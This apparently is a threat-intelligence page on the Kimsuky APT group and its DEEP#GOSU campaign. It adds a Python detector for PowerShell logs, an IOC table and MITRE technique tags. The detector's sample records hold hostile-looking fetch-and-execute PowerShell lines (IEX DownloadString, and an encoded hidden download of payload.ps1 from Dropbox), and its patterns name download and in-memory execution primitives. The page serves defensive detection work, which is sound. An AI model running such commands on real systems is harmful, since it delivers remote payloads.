Exposing the Steps of the Kimsuky APT Group

2024-12-27 Picus Security

https://www.picussecurity.com/resource/blog/exposing-the-steps-of-the-kimsuky-apt-group

Picus profiles Kimsuky as a North Korean espionage actor active since at least 2012 and tracked under aliases including Black Banshee, Velvet Chollima, THALLIUM and Emerald Sleet. The source describes targeting of South Korean government, think-tank, defense and policy interests, with later activity extending to the United States, Japan, Russia and Europe. It highlights the DEEP#GOSU campaign, where phishing attachments executed PowerShell and VBScript to pull payloads from services such as Dropbox and deploy remote access malware including TruRat. The article also summarizes Kimsuky use of spear phishing, RandomQuery, xRAT and Gold Dragon for keylogging, remote shell access, persistence and data exfiltration.
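The DEEP#GOSU pattern summarized above (PowerShell or VBScript retrieving a stage from Dropbox and running it) is a good fit for script-block-log detection. The following is an added example, not code from the Picus post: a small analyzer run over constructed PowerShell script-block records (Event ID 4104 style). The record field names, the sample commands and the host list are assumptions for this example; it also decodes -EncodedCommand blobs first, because the Dropbox URL is otherwise hidden inside base64.

```python
import base64
import re
from typing import Optional

# -EncodedCommand (and its short aliases) carries a base64 blob of UTF-16LE text.
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# PowerShell primitives that fetch content from the network.
DOWNLOAD_PRIMITIVES = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|"
    r"DownloadFile|DownloadData|Start-BitsTransfer", re.I)

# Cloud storage hosts abused for payload staging (Dropbox, as in DEEP#GOSU; assumed list).
CLOUD_HOSTS = re.compile(
    r"\b(?:content\.dropboxapi\.com|api\.dropboxapi\.com|dl\.dropboxusercontent\.com|"
    r"(?:www\.)?dropbox\.com)\b", re.I)

# Primitives that execute fetched text without writing a script file first.
EXEC_PRIMITIVES = re.compile(r"\bIEX\b|Invoke-Expression|\[ScriptBlock\]::Create|&\s*\$env:", re.I)


def decode_encoded_command(text: str) -> str:
    """Replace any -EncodedCommand base64 blob with its decoded UTF-16LE text so the
    pattern matches below see the real command. Invalid blobs are left untouched."""
    def _repl(m: re.Match) -> str:
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            return " " + raw.decode("utf-16-le", errors="replace") + " "
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
    return ENCODED_CMD.sub(_repl, text)


def analyze_record(record: dict) -> Optional[dict]:
    """Return an alert dict for one script-block record, or None.
    A hit requires a download primitive AND a cloud-storage host; either alone is too
    noisy. In-memory execution on top of that raises the severity to high."""
    script = decode_encoded_command(record.get("ScriptBlockText", ""))
    reasons = []
    if DOWNLOAD_PRIMITIVES.search(script):
        reasons.append("download primitive")
    hosts = sorted({h.lower() for h in CLOUD_HOSTS.findall(script)})
    if hosts:
        reasons.append("cloud storage host: " + ", ".join(hosts))
    if EXEC_PRIMITIVES.search(script):
        reasons.append("in-memory execution")
    if "download primitive" not in reasons or not hosts:
        return None
    severity = "high" if "in-memory execution" in reasons else "medium"
    return {"host": record.get("host"), "severity": severity,
            "reasons": reasons, "script": script.strip()}


def scan(records) -> list:
    """Run analyze_record over an iterable of records and keep the hits."""
    return [a for a in (analyze_record(r) for r in records) if a]


def _encode(cmd: str) -> str:
    """Build an -EncodedCommand argument the way powershell.exe expects it (UTF-16LE)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode()


# Constructed sample records; field names are an assumption for this example.
SAMPLE_LOGS = [
    {"host": "ws01", "ScriptBlockText": "Get-ChildItem C:\\Users\\a\\Documents"},
    {"host": "ws02", "ScriptBlockText":
        "IEX (New-Object Net.WebClient).DownloadString('https://content.dropboxapi.com/2/files/download')"},
    {"host": "ws03", "ScriptBlockText": "powershell -nop -w hidden -EncodedCommand " + _encode(
        "Invoke-WebRequest -Uri https://dl.dropboxusercontent.com/s/x/payload.ps1 -OutFile $env:TEMP\\u.ps1")},
    {"host": "ws04", "ScriptBlockText": "Invoke-RestMethod -Uri https://api.github.com/repos/x/y/releases"},
    {"host": "ws05", "ScriptBlockText": "Start-Process https://www.dropbox.com/home"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(hit["host"], hit["severity"], "; ".join(hit["reasons"]))
```

Only ws02 (high, decoded-in-memory fetch plus IEX) and ws03 (medium, encoded download to disk) fire; ws04 downloads from a non-listed host and ws05 names Dropbox without any download primitive, so both stay quiet. In production the host list should come from the IOC feed rather than a regex literal, and the decoded script text belongs in the alert so an analyst sees the real command.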

Indicators of Compromise

Type | Value | First seen | Last seen
DOMAIN | bk.ru | 2024-12-04 | 2026-04-17
HASH | 081804b491c70bfa63ecdbe9fd4618d… | 2024-09-09 | 2026-04-03
HASH | 689cfaa9319f3f7529a31472ecf6b2e… | 2024-09-09 | 2025-12-31
HASH | 2360a69e5fd7217e977123c81d3dbb6… | 2023-11-01 | 2025-12-31
HASH | 973f7939ea03fd2c9663dafc21bb968… | 2024-02-29 | 2025-09-01
HASH | 5e40d106977017b1ed235419b1e59ff… | 2021-02-18 | 2025-09-01
HASH | 63fb47c3b4693409ebadf8a5179141a… | 2024-02-21 | 2025-02-16
HASH | d8565d58ad8e4f5558b5cd70df0ad12… | 2024-09-09 | 2024-12-27
HASH | 3c8dbfcbb4fccbaf924f9a650a04cb4… | 2024-09-09 | 2024-12-27
HASH | cbf4cfa2d3c3fb04fe349161e051a8c… | 2024-09-09 | 2024-12-27
HASH | 0b5db31e47b0dccfdec46e74c0e70c6… | 2024-09-09 | 2024-12-27
HASH | 3ea2ead8f3cec030906dcbffe3efd5c… | 2024-09-09 | 2024-12-27
HASH | c83c7b000a955f2b8cb92bb112ed606… | 2024-09-09 | 2024-12-27
HASH | a03d13c9825e150810e6e6aaf053d71… | 2024-09-09 | 2024-12-27
HASH | 99dbc6fe3c3e465052fcefa16428617… | 2024-09-09 | 2024-12-27
HASH | 7667d1b8fcc4f712084e3e3f8b4ab50… | 2024-09-09 | 2024-12-27
HASH | 15d53bb839e00405a34a8b690ec181f… | 2024-09-09 | 2024-12-27
HASH | 5c907b722c53a5be256dc5f96b755bc… | 2024-09-09 | 2024-12-27
HASH | c6a48365c3db9761bd60981bdcdd87a… | 2024-09-09 | 2024-12-27
HASH | bfd74b4a1b413fa785a49ca4a9c0594… | 2024-09-09 | 2024-12-27
HASH | f1713afaf5958bdf3e975ebbab8245a… | 2024-09-09 | 2024-12-27
HASH | 2546d239a262c24a6f8ea01d890cbc4… | 2024-09-09 | 2024-12-27
HASH | bce1eb513aaac344b5b8f7a9ba9c9e3… | 2024-09-09 | 2024-12-27
HASH | f3b0da965a4050ab00fce727bb31e0f… | 2024-09-09 | 2024-12-27
HASH | 479038eb12ed07893ee0dcc04fbdcf1… | 2024-09-09 | 2024-12-27
HASH | 927b3564c1cf884d2a05e1d7bd24362… | 2024-09-09 | 2024-12-27
HASH | 89cad9a57985cc0ab3b7403a943ad0a… | 2024-03-18 | 2024-12-27
HASH | 60666cacdd6806ed05771f32eaa719e… | 2024-03-18 | 2024-12-27
HASH | b72caab78d164637fea0937d7a94fc4… | 2024-03-18 | 2024-12-27
HASH | f262588c48d2902992ffd275d2be636… | 2024-03-18 | 2024-12-27
HASH | 69c917ea96db28dbd5b67073ca0aac2… | 2024-03-18 | 2024-12-27
HASH | 1b75f70c226c9ada8e79c3fdd987277… | 2024-03-18 | 2024-12-27
HASH | 1617587ccdf5b0344089559ecf8fe7d… | 2024-03-18 | 2024-12-27
HASH | 46a5d54c264152ce915792af31c7582… | 2024-03-18 | 2024-12-27
HASH | c7f4aa77be7f7afe9d0665d3e705dbf… | 2023-12-15 | 2024-12-27
HASH | c9a7b42c7b29ca948160f95f017e9e9… | 2023-12-15 | 2024-12-27
URL | https://niscarea.com | 2023-11-28 | 2024-12-27
DOMAIN | niscarea.com | 2023-11-28 | 2024-12-27
HASH | 8bfa4fe0534c0062393b6a2597c3491… | 2023-11-13 | 2024-12-27
URL | http://00701111.000webhostapp.c… | 2023-09-23 | 2024-12-27
DOMAIN | 00701111.000webhostapp.com | 2023-09-23 | 2024-12-27
HASH | db6a9934570fa98a93a979e7e0e218e… | 2023-08-24 | 2024-12-27
HASH | 6c121f2b2efa6592c2c22b29218157e… | 2023-06-29 | 2024-12-27
HASH | 492a643bd1efdaca4ca125ade1b606e… | 2023-04-20 | 2024-12-27
HASH | a64fa9f1c76457ecc58402142a8728c… | 2023-03-30 | 2024-12-27
HASH | 5009c7d1590c1f8c05827122172583d… | 2023-03-30 | 2024-12-27
HASH | fee4f9dabc094df24d83ec1a8c4e4ff… | 2023-03-30 | 2024-12-27
HASH | 87c5d0c93b80acf61d24e7aaf0faae2… | 2023-03-30 | 2024-12-27
HASH | e6bbc33815b9f20b0cf832d7401dd89… | 2023-03-29 | 2024-12-27
HASH | 91eaf215be336eae983d069de16630c… | 2021-02-18 | 2024-12-27

The hash values are truncated on this page; take the full hashes from the linked Picus post before loading them into a matcher, and treat the first-seen and last-seen columns as this page's own observation window for each indicator (several last-seen dates fall after the article's publication date). Two of the domain entries need care before they reach a blocklist: bk.ru is a public webmail service run by Mail.ru, so its presence here presumably reflects attacker-registered sender accounts, and 000webhostapp.com is a free web-hosting service. Match on the full sender address and on the full host 00701111.000webhostapp.com rather than on either parent domain, or you will block legitimate traffic while missing the next account or subdomain the actor registers.

Related Reports

2024-09-12 • 50% Match
#Kimsuky #T1102.002 #T1082 #T1059.003 #T1567.002 #T1140 #T1005 #T1070.004 #T1587.001 #T1041 #T1608.001 #T1071.001 #T1112 #T1083 #T1056.001 #T1059.006 #T1204.001 #T1059.007 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1057 #T1059.005 #T1583.006 #T1518.001 #T1566.001 #T1547.001 #T1585.002 #T1053.005 #T1598.003 #T1583.001 #T1059.001 #T1036.005 #T1552.001 #T1585.001 #T1105 #T1219 #T1055 #T1553.002 #T1562.001 #T1027.002 #T1133 #T1190 #T1098 #T1016 #T1074.001 #T1588.002 #T1055.012 #T1587 #T1078.003 #T1071.002 #T1562.004 #T1550.002 #T1111 #T1071.003 #T1591 #T1003.001 #T1218.011 #T1593.002 #T1586.002 #T1588.005 #T1583.004 #T1036.004 #T1589.003 #T1594 #T1218.010 #T1557 #T1593.001 #T1218.005 #T1589.002 #T1584.001 #T1070.006 #T1021.001 #T1560.001 #T1176 #T1136.001 #T1543.003 #T1012 #T1534 #T1560.003 #T1007 #T1564.003 #T1114.003 #T1114.002 #T1564.002 #T1040 #T1546.001 #T1505.003
Shares tags: Kimsuky, T1082, T1071.001
2024-07-19 • 43% Match
#Trend #Andariel #Kimsuky #MoonstoneSleet #Lazarus #T1082 #T1059.003 #T1090 #T1140 #T1005 #T1070.004 #T1041 #T1113 #T1555 #T1560 #T1071.001 #T1046 #T1112 #T1115 #T1083 #T1497 #T1056.001 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1071 #T1124 #T1222 #T1552 #T1057 #T1583.003 #T1518.001 #T1547.001 #T1053.005 #T1539 #T1608.005 #T1583.001 #T1059.001 #T1053 #T1552.001 #T1566 #T1059 #T1003 #T1497.001 #T1102.001 #T1574.002 #T1562.001 #T1490 #T1486 #T1129 #T1133 #T1571 #T1548 #T1190 #T1203 #T1564.001 #T1087 #T1562.004 #T1218.011 #T1070.006 #T1547 #T1068 #T1614 #T1573 #T1095 #T1562 #T1070 #T1047 #T1056 #T1176 #T1010 #T1033 #T1569.002 #T1543.003 #T1485 #T1012 #T1202 #T1087.002 #T1021.004 #T1222.001 #T1518 #T1564.003 #T1505.003 #T1069.002 #T1564 #T1595.002 #T1027.005 #T1070.001 #T1056.004 #T1584
Shares tags: Kimsuky, T1082, T1560